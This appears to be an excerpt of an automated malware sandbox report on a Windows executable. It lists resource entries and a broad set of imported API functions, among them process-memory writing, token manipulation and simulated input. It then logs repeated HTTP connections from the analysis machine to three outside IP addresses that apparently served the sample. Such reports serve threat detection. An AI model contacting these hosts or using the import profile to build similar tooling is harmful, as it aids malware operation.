                                                        RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                        RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                        RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                        DLLImport
                                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                        USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                        GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                        OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain
                                                        EnglishUnited States
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 26, 2024 15:18:50.146711111 CEST4973980192.168.2.4172.67.181.150
                                                        Sep 26, 2024 15:18:50.151551008 CEST8049739172.67.181.150192.168.2.4
                                                        Sep 26, 2024 15:18:50.151650906 CEST4973980192.168.2.4172.67.181.150
                                                        Sep 26, 2024 15:18:50.162585020 CEST4973980192.168.2.4172.67.181.150
                                                        Sep 26, 2024 15:18:50.167403936 CEST8049739172.67.181.150192.168.2.4
                                                        Sep 26, 2024 15:18:50.646886110 CEST8049739172.67.181.150192.168.2.4
                                                        Sep 26, 2024 15:18:50.647413969 CEST8049739172.67.181.150192.168.2.4
                                                        Sep 26, 2024 15:18:50.647597075 CEST4973980192.168.2.4172.67.181.150
                                                        Sep 26, 2024 15:18:50.655374050 CEST4973980192.168.2.4172.67.181.150
                                                        Sep 26, 2024 15:18:50.660239935 CEST8049739172.67.181.150192.168.2.4
                                                        Sep 26, 2024 15:19:05.718247890 CEST4974080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:05.723222971 CEST80497403.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:05.723315001 CEST4974080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:05.733509064 CEST4974080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:05.738512993 CEST80497403.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:06.200927019 CEST80497403.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:06.201195002 CEST4974080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:07.237996101 CEST4974080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:07.242993116 CEST80497403.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:08.256716013 CEST4974180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:08.261684895 CEST80497413.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:08.261800051 CEST4974180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:08.273061991 CEST4974180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:08.277968884 CEST80497413.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:08.717266083 CEST80497413.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:08.717463970 CEST4974180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:09.784862041 CEST4974180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:09.789802074 CEST80497413.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.803687096 CEST4974280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:10.808633089 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.808717966 CEST4974280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:10.820157051 CEST4974280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:10.825146914 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.825175047 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.825185061 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.825192928 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.825258017 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.825417995 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.825427055 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.825495005 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:10.825505018 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:11.283819914 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:11.285610914 CEST4974280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:12.331876040 CEST4974280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:12.336746931 CEST80497423.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:13.350483894 CEST4974380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:13.355345964 CEST80497433.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:13.355448008 CEST4974380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:13.362517118 CEST4974380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:13.367389917 CEST80497433.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:16.738533974 CEST80497433.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:16.738704920 CEST80497433.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:16.738795042 CEST4974380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:16.741281033 CEST4974380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:16.746193886 CEST80497433.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:21.805131912 CEST4974480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:21.809973001 CEST80497443.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:21.810142040 CEST4974480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:21.913110018 CEST4974480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:21.918463945 CEST80497443.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:22.276633978 CEST80497443.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:22.276743889 CEST4974480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:23.425525904 CEST4974480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:23.433154106 CEST80497443.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:24.445980072 CEST4974580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:24.451284885 CEST80497453.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:24.451822996 CEST4974580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:24.473990917 CEST4974580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:24.478944063 CEST80497453.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:25.988006115 CEST4974580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:25.993347883 CEST80497453.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:25.993444920 CEST4974580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:27.008064032 CEST4974680192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:27.013498068 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.013652086 CEST4974680192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:27.029966116 CEST4974680192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:27.034826994 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.034868002 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.034883976 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.034888029 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.034925938 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.034969091 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.035064936 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.035077095 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.035098076 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.497574091 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:27.497865915 CEST4974680192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:28.534945011 CEST4974680192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:28.774656057 CEST80497463.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:29.556358099 CEST4974780192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:29.561413050 CEST80497473.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:29.561534882 CEST4974780192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:29.572024107 CEST4974780192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:29.577742100 CEST80497473.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:30.017743111 CEST80497473.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:30.017801046 CEST80497473.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:30.018189907 CEST4974780192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:30.025163889 CEST4974780192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:30.030035019 CEST80497473.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:35.145925999 CEST4974880192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:35.150914907 CEST80497483.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:35.151035070 CEST4974880192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:35.161873102 CEST4974880192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:35.166768074 CEST80497483.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:35.616090059 CEST80497483.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:35.616211891 CEST4974880192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:36.675544977 CEST4974880192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:36.680572987 CEST80497483.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:37.695240021 CEST4974980192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:37.700150013 CEST80497493.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:37.700270891 CEST4974980192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:37.714678049 CEST4974980192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:37.719939947 CEST80497493.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:38.155500889 CEST80497493.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:38.155617952 CEST4974980192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:39.222486973 CEST4974980192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:39.227528095 CEST80497493.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.241050005 CEST4975080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:40.246211052 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.246298075 CEST4975080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:40.259078026 CEST4975080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:40.264048100 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.264106035 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.264134884 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.264161110 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.264188051 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.264329910 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.264358997 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.264408112 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.264437914 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.711801052 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:40.711910963 CEST4975080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:41.769537926 CEST4975080192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:41.774688005 CEST80497503.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:42.787988901 CEST4975180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:42.793114901 CEST80497513.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:42.793248892 CEST4975180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:42.803158998 CEST4975180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:42.808259010 CEST80497513.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:43.270837069 CEST80497513.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:43.271022081 CEST80497513.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:43.271096945 CEST4975180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:43.273870945 CEST4975180192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:43.278789997 CEST80497513.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:48.477735043 CEST4975280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:48.482719898 CEST80497523.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:48.482795000 CEST4975280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:48.498016119 CEST4975280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:48.503344059 CEST80497523.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:48.949615002 CEST80497523.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:48.949687958 CEST4975280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:50.003714085 CEST4975280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:50.008800983 CEST80497523.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:51.029184103 CEST4975380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:51.034173012 CEST80497533.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:51.034256935 CEST4975380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:51.054605961 CEST4975380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:51.059533119 CEST80497533.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:51.496975899 CEST80497533.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:51.497809887 CEST4975380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:52.566446066 CEST4975380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:52.571346045 CEST80497533.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.798787117 CEST4975480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:53.804949999 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.809708118 CEST4975480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:53.871321917 CEST4975480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:53.876300097 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.876338005 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.876410961 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.876457930 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.876471996 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.876607895 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.876621962 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.876646042 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:53.876658916 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:54.268795967 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:54.269126892 CEST4975480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:55.379688025 CEST4975480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:55.485635042 CEST80497543.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:56.423190117 CEST4975580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:56.428613901 CEST80497553.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:56.428809881 CEST4975580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:56.437766075 CEST4975580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:56.442886114 CEST80497553.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:56.893914938 CEST80497553.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:56.895108938 CEST80497553.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:19:56.895163059 CEST4975580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:56.898225069 CEST4975580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:19:56.903027058 CEST80497553.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:20:02.576246977 CEST4975680192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:02.581202984 CEST8049756156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:02.581276894 CEST4975680192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:02.596055031 CEST4975680192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:02.600976944 CEST8049756156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:03.558782101 CEST8049756156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:03.565818071 CEST4975680192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:04.097366095 CEST4975680192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:04.102395058 CEST8049756156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:05.117187023 CEST4975780192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:05.126085997 CEST8049757156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:05.126168966 CEST4975780192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:05.139331102 CEST4975780192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:05.144258022 CEST8049757156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:06.644465923 CEST4975780192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:06.691138029 CEST8049757156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.665719986 CEST4975880192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:07.671494961 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.671597958 CEST4975880192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:07.682749987 CEST4975880192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:07.687756062 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.687818050 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.687846899 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.687874079 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.687905073 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.688023090 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.688050032 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.688097000 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:07.688122988 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:09.191145897 CEST4975880192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:09.239198923 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:10.209851980 CEST4975980192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:10.830856085 CEST8049759156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:10.830925941 CEST4975980192.168.2.4156.242.132.82
